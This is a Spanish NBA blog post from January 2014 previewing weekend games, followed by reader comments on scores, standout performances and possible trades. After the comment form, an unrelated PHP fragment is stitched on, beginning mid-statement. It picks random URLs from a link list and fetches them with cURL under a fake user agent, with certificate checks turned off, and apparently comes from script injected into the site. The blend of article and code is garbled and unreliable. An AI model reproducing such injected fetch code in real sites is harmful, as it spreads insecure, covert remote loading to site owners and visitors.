Fin de semana

24 de January de 2014 por TheDeerHunter

¡Por fin viernes! Baloncesto a cascoporro que deberéis atender en nuestra ausencia.

Hoy tenemos un menú algo gris sobrecargado de partidos, pero con varios duelos aprovechables y, lo que es mejor, repartidos en el tiempo. A la 1:30 AM los Spurs visitan Atlanta, el tercer mejor balance de su conferencia y particularmente difíciles de superar en el Phillips Arena. A la misma hora los Mavs visitan Brooklyn contra unos Nets que empiezan a verse considerablemente temibles. Poseen el mejor balance de la conferencia junto a Indiana en los últimos 10 partidos (8-2), positivo como locales y teniendo en cuenta que los Mavs flojean lejos del calor de sus aficionados.
A las 2AM habrá que decidirse por uno de los dos platos fuertes del día. Por un lado los Clippers visitan el United Center y por el otro los Grizzlies viajan a Houston, donde les reciben unos Rockets en plena forma.
Para horarios golfos dejamos dos interesantes choques, como son el Wizards@Suns (3AM) y el Wolves@Warriors(4:30AM)
Dejamos para seguimiento especial la actuación de Durant (1:30AM) en el Boston Garden. No hay mejor escenario para mantener el increíble nivel de juego que arrastra.

El sábado 8 choques, de los que destacamos algo más de la mitad. A la 1AM buen aperitivo en el Clippers@Raptors, pero pronto habrá que cambiar al Thunder@Sixers (1:30AM) para seguir las evoluciones de Durant en el Wells Fargo.
Los Rockets devuelven visita a Grizzlies (2AM) y los Pacers visitan Denver con la incógnita de qué versión de rival se encuentran. Finalmente los Blazers reciben a Love y sus compañeros con cierto aroma a rechancha “all-starera”.

Por último el domingo 8 partidos más (va de récord) Lo bueno es que alguno de ellos son a horario óptimo para los que vivimos al otro lado del Atlántico. 19h, hora española, hay que ver como sea el posible desquite de los Spurs en Miami, con el triple de Allen todavía en la retina. A las 21:30h un Lakers@Knicks en horas bajas.
Después, a las 3AM para los que se lo puedan permitir, está previsto un Blazers@Warriors que puede ser perfectamente uno de los cruces clave del trono del oeste.

Que descanséis, disfrutéis del fin de semana y veáis todo el baloncesto que os apetezca.

Comenta

23 comentarios a esta entrada

  1. Denise dice:
    #1

    Alguien por ahi?? Viendo el ORL – LAL, buen partido ofensivo e igualado hasta el momento, con partidazo de Tobias Harris, toda una pesadilla para la defensa lakeriana. El buen hacer de Orlando lo está contrarrestando bien Lakers a base de triples de sus exteriores, y a Marshall que reparte asistencias como churros. Vaya tio, mediado el 3er cuarto ya lleva 11 asistencias. Tendría que mirar números, pero..facilmente, Marshall puede ser el maximo asistente de la liga en el último mes.

      Citar

  2. Denise dice:
    #2

    Espectacular 3er cuarto de Orlando, creo que deben haber sido los mejores minutos del equipo en toda la liga. Y ojo a los números que puede acabar haciendo Harris, que falta un cuarto por jugar y ya está en 24-16. Por otra parte, Lakers ayuda bastante en esto porque la defensa de los californianos es cero.

      Citar

  3. Denise dice:
    #3

    Ojo a Melo que está violando literalmente a los Bobcats. 49 puntos, 20/26 en tiros de campo y queda un cuarto y medio!!.
    Supongo que es Kidd-Gilchrist el que lo estará “defendiendo”. Qué poco me gusta este jugador

      Citar

  4. Denise dice:
    #4

    Bueno, pues victoria cómoda de Orlando en un partido igualado tras el descanso, pero que en el tercer cuarto y tras ponerse los Lakers 9 arriba, los de Florida sacaron su repertorio ofensivo dando para mí los mejores minutos de la temporada. Tobias Harris (28-20 y 9/15 TC) en plan artículo O’Neal de hago lo que quiero, como quiero y cuando quiero, otro gran partido de Nelson ante Lakers (22-6 y 7/11 TC) y un completisimo partido de un Oladipo irregular en el tiro, pero aportando en todas las facetas del juego y haciendo con 15-12-5 otro doble-doble.
    La rotación de Vaughn cada vez es más clara y Harkless y Nicholson parecen contar cada vez menos para el técnico. Nicholson no me agrada tanto, pero lo de Harkless no lo entiendo, me parece un fantastico tipo glue-guy. Imagino que si antes del Deadline, Orlando hace algun movimiento, empaquetarán a alguno de los dos junto a Nelson/Davis/Afflalo.
    Por los Lakers, solo salvaría a Marshall, genial durante todo el encuentro. Meeks y Pau muy bien en e primer tiempo y desaparecido en el segundo, y las canastas de Young han sido intrascendentes. Como siempre, pésima defensa del equipo de D’Antoni recibiendo 114 puntos, a botepronto, diría que es la máxima anotación de Orlando en toda la temporada sin contar partidos con prórroga.

      Citar

  5. Denise dice:
    #5

    Melo va por 60 y queda un cuarto. ¿Superará el Kobe81?

      Citar

  6. Denise dice:
    #6

    En otros partidos, Toronto ha ganado a 76ers con 34-9 de De Rozan que ya huele el All-Star y triple-doble de Lowry 18-10-13, los Spurs le están pegando una paliza a Hawks en un encuentro donde Korver ya ha metido su triple diario y Diaw se está dando un homenaje ante uno de sus ex-equipos. Oklahoma le está dando otra paliza en Boston a los Celtics sin Durant y con su tripleta de jovenes Lamb-Jackson-Perry Jones secundando bien a Ibaka.
    Otra paliza, esta de Cleveland a Bucks con 0 minutos de Bennet hasta el momento y los Clippers en Chicago sacando la metralleta con 10 triples en el descanso pese al buen partido de Boozer frente a Griffin, enfrentamiento morboso para el blog. 🙂

      Citar

  7. Denise dice:
    #7

    Bueno, pues Melo creo que se va a quedar en 62 puntos, 13 rebotes y 23-35 en TC, 6 triples, uno de ellos desde el centro del campo. Quedan 7 minutos y lo acaban de sentar, por lo que no creo que vuelva a jugar más. El domingo tiene cita con Lakers y su gran defensa.

      Citar

  8. Denise dice:
    #8

    Woww los Pistons!!. Si Cheeks no es destituido esta noche, apaga y vamonos.
    A finales del 3er cuarto ganaban de 16 a unos sin Tyreke, Anderson, Holiday y Jason Smith. A partir de ahí, colapso ofensivo de los de Michigan, y defensa de risa que ha hecho que Morrow, si señores!! Anthony Morrow saque el rifle de paseo y Gordon con un tiro en el último segundo de la victoria a los Pelicans.

    Otros que se ha complicado la vida han sido los Nets, que ganaban de 10 a Mavs a 4 minutos con Teletovic haciendo el partido de su vida, y al final han sufrido hasta el último segundo para derrocar por solo un punto a los texanos.

      Citar

  9. Denise dice:
    #9

    Y ganan los Grizzlies de 1, tras fallar Beverley un triple (llevaba 1/7 en triples y 1/10 en tiros jojo) que hubiese supuesto la victoria de Houston. 10 triples para Parsons, y un sorprendente James Johnson anotando para Memphis 3 canastas decisivas en el último cuarto.

      Citar

  10. Sancho88 dice:
    #10

    Pues la de Melo no es la única exhibición de la noche. Marcus Thornton renace de sus cenizas para completar un primer cuarto brillante frente a los Pacers. 22 puntos, 3 rebotes y 9/12 en tiros de campo en 12 minutos. Parece que los morados han sabido encontrar una rápida solución a la baja de Cousins y Gay. Esperemos que dure

      Citar

  11. Ruxixon dice:
    #11

    Pues al final 42 puntos para Marcus y 38 para I.Thomas,eso si 27 tiros para el primero y 31 tiros para el “base”.

    La noche ha dejado unas estadísticas sensacionales para ir degustando los box score de cada partido aquellos que no hayamos realizado ningún visionado.

      Citar

  12. Nacho dice:
    #12

    Ojito a los Nets, que empiezan a carburar.
    Primer partido a final igualado que ganan los Wolves.
    Vale que eran los Celtics, pero OKC ya carburan hasta sin Durant (y Westbrook)
    Menphis sigue su pasito a pasito.
    Estamos en mitad de temporada, si algún equipo quiere dar un salto adelante tiene que hacer los trades ya. El AllStar va a quedar lejos (no creo que haya ninguno trascendente)
    Ahora mismo habría un Nets vs. Miami en primera ronda, pero tal como va la progresión, o los Raptors aguantan bien, o los de Kidd acaban terceros. De ese hecho van a depender muchas cosas, porque creo que unos Brooklyn en este estado pueden dar boleto a los Heat, pero sería más difícil con Pacers. Yo empezaría a poner dinero ahora.

      Citar

  13. Luis H. dice:
    #13

    Vaya telita lo de Harrison Barnes. Caso para el psicólogo. El tío se marca un 1-7 y la intrascendencia habitual de este curso. Curry le deja absolutamente solo en la línea de 3 para ganar el partido ante los Wolves y falla, algo que puede ocurrir pero que el año pasado seguramente hubiera caído dentro. ¿Qué le pasa a este muchacho, con lo que demostró el curso pasado?

      Citar

  14. Ruxixon dice:
    #14

    Corregirme si me equivoco pero Barnes tampoco tuvo un nivel altísimo durante la pasada RS.De vez en cuando salpicaba algún partido de 20 puntos pero lo normal eran 10 puntos o menos.Y las sensaciones eran un poco las mismas,un poco de dejadez y pareciendo que el tio no explota todo lo que tiene.Luego ya llegó la versión de PO y ahí si que estuvo siempre bárbaro.

    A mí lo que más preocupa de la relajación de los Heat es el regalo envenenado que les puede caer en PO.Supongo que Toronto,Brooklyn o Chicago acabaran entre los 6 primeros pero uno de estos 3 son rivales incómodos.

      Citar

  15. Jose Luis dice:
    #15

    Lo que a mi me parece grave es lo de Curry en los últimos cuartos, siempre tiene pérdidas decisivas. A ver si le deja el balón más a Iguodala, porque vaya tela.

    Los Warriors de seguir así no se comen un colín.

      Citar

  16. Denise dice:
    #16

    Lo de H. Barnes es normal, un tio joven en progresión y le colocan delante a un bicho todoterreno como Iguodala, pues me parece normal que se haya quedado estancado. Me parece un gran jugador pero en GSW no tiene sitio por lo que lo empaquetaría junto a Bogut por un center…¿Joakim Noah, Larry Sanders?

      Citar

  17. Esteban dice:
    #17

    Denise:
    Lo de H. Barnes es normal, un tio joven en progresión y le colocan delante a un bicho todoterreno como Iguodala, pues me parece normal que se haya quedado estancado. Me parece un gran jugador pero en GSW no tiene sitio por lo que lo empaquetaría junto a Bogut por un center…¿Joakim Noah, Larry Sanders?

    era cantado q el fichaje de iguodala cortaria de progresion de barnes, quien tampoco es un revulsivo como para ser sexto hombre

    despues de los PO pasados donde promedio 16 puntos, deberian haber apostado por mantenerlo en su 5 inicial y gastarse el dinero de iguodala en renovar a landry, jack y un perimetral de gol y las cosas le hubiesen funcionado mejor

      Citar

  18. Schize dice:
    #18

    Continúa el fin de semana de actuaciones individuales estelares, esta vez le ha tocado a Ross, ¡51 puntos! Eso si, no le ha servido para conseguir la victoria ante los Clippers.

      Citar

  19. Nacho dice:
    #19

    Impresionante el paso adelante de Ibaka tras la ausencia de Westbrook.

      Citar

  20. rumbero dice:
    #20

    Nacho:
    Impresionante el paso adelante de Ibaka tras la ausencia de Westbrook.

    Pues sí. A Ibaka siempre se le reclama más peso ofensivo y de hecho esta temporada ya estaba teniendo más protagonismo antes de la lesión de Westbrook, pero ahora lo estamos viendo asiduamente por encima de los 20 puntos. Bien por él. Algo parecido se puede decir del amigo Griffin que está jugando a un nivel superlativo con la baja de Paul.

    Del fin de semana me quedo con los Grizzlies. En 87 y 81 puntos han dejado a los Rockets en el back to back (5º mejor ataque de la liga) Se ha visto bastante de la defensa del año pasado y eso que no parece que Marc esté aún al 100%. Y puede ser interesante lo de Courtney Lee. De momento lo está metiendo todo, y sin esperar que siga así es un tío que no les va a comprometer defensivamente y que en momentos que haya que meterla desde fuera puede ser mucho más válido que Tony Allen. 8-2 en los últimos 10 partidos y con la mirada puesta en la octava plaza.

      Citar

  21. Denise dice:
    #21

    Los Clippers cortan a Darius Morris, se quedan con 14 tios en plantilla y por tanto un hueco libre, y el nombre de Bynum vuelve a sonar en el ambiente.

      Citar

  22. Esteban dice:
    #22

    otra derrota de los Lakers y su record es 16-29, estando en el oeste podemos concluir que no jugaran PO

    q hacer? yo venderia a gasol que con el temporadon que esta haciendo alquien va a ofrecer algo bueno por el, y dejo a Kobe y Nash sin jugar e iria en busqueda de un top 5 en el proximo draft, solo tienen un par de victorias mas que Orlando, los sixers y Boston, asi q tranquilamente podrian elegir bien arriba

      Citar

  23. Jose Luis dice:
    #23

    +1, está clarísimo. Si Pau no va a renovar (deben saber ya si va a renovar o no, o siquiera si van a ofrecérsela) traspasarlo, está jugando muy bien y es expiring. La cosa es que, por eso mismo de que es expiring, a los Lakers tampoco le conviene quitárselo así como así. Debe ser complicado, pero algún equipo habrá que tenga expirings altos y no jueguen

    Hay pocos candiatos, así mirando rápido…

    Pierce, para cubrir la baja de López
    Salmons + Johnson + Kleiza,
    ¿Bogut? no lo veo
    Gortat + Ariza… pf no veo que mejoren
    Villanueva + Stuckey (+ madera interior… pf)
    Gordon + Sessions

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>